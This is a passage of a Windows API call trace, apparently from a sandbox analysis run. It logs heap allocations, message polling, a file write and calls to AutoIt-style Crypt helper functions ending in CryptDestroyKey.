RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0247.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0247.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0247.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0247.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0247.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0247.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0247.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0247.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0247.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0247.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0247.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0247.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0247.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0247.589] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.589] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0247.589] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.589] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.591] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0247.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0247.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0247.591] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0247.633] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0247.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f10 | out: hHeap=0x970000) returned 1 [0247.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0247.634] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0247.634] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0247.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0247.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0247.634] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0247.634] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0247.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0247.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0247.634] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0247.634] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0247.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0247.634] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0247.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0247.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0247.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.644] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.644] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0247.645] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.646] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f2b880*, nNumberOfBytesToWrite=0x17868, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f2b880*, lpNumberOfBytesWritten=0x8cf5e4*=0x17868, lpOverlapped=0x0) returned 1 [0247.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0247.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2b880 | out: hHeap=0x970000) returned 1 [0247.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0247.652] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.652] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.652] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0247.652] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0247.652] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0247.652] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0247.652] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0247.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0247.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e518b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0247.652] CryptDestroyKey (hKey=0xa873d0) returned 1 [0247.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0247.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0247.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0247.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0247.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0247.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0247.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0247.653] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0247.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0247.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0247.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0247.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0247.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0247.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0247.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0247.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0247.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0247.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0247.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0247.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0247.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0247.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0247.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0247.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0247.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0247.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0247.654] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0247.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0247.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0247.654] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0247.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0247.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0247.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515b0 [0247.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0247.654] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0247.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ae8 [0247.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0247.654] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0247.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ae8 | out: hHeap=0x970000) returned 1 [0247.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0247.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512e0 [0247.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0247.655] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0247.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0247.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0247.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0247.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0247.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0247.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0247.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0247.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0247.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0247.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512c8 [0247.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0247.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51550 [0247.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51388 [0247.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51568 [0247.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0247.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0247.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51310 [0247.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51340 [0247.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51490 [0247.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0247.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0247.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0247.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0247.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0247.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0247.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0247.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0247.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0247.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0247.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0247.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0247.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0247.656] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0247.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0247.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0247.656] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0247.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0247.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0247.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0247.656] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0247.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0247.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0247.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51490 [0247.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0247.657] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0247.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0247.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0247.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0247.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0247.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0247.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0247.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0247.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0247.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0247.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0247.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0247.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0247.657] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0247.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0247.657] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0247.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0247.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0247.657] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0247.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0247.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0247.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0247.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0247.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0247.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0247.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0247.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0247.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0247.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0247.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0247.658] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0247.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0247.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0247.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0247.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0247.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0247.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0247.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0247.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0247.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0247.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0247.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0247.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0247.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0247.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0247.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0247.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0247.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0247.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0247.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0247.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0247.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0247.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0247.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0247.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0247.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0247.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0247.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0247.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0247.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0247.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0247.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0247.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0247.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0247.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0247.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0247.659] HeapFree (in: hHeap=0x970000, 